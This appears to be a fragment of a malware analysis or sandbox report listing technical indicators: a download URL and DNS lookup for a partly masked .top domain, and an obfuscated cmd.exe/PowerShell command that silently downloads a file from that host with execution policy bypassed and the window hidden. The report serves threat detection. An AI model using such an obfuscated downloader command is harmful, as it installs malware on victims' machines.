Technical Information
- http://www.de###oyedug.top/user.php?f=##### as %appdata%.exe
- DNS ASK de###oyedug.top
- '<SYSTEM32>\cmd.exe' /c P^o^wershe^LL.e^Xe^ -^ex^ec^U^t^i^ONPOlIcY^ bYPass^ -^n^o^P^rofIl^e^ ^-wI^nd^ow^stYLe hI^d^d^eN ^(New-OBj^ect ^s^Yst^em.net.weBcl^I^e^N^t).do^w^nLo^ad^f^ILe(^'http://www.de###oyedug....' (with hidden window)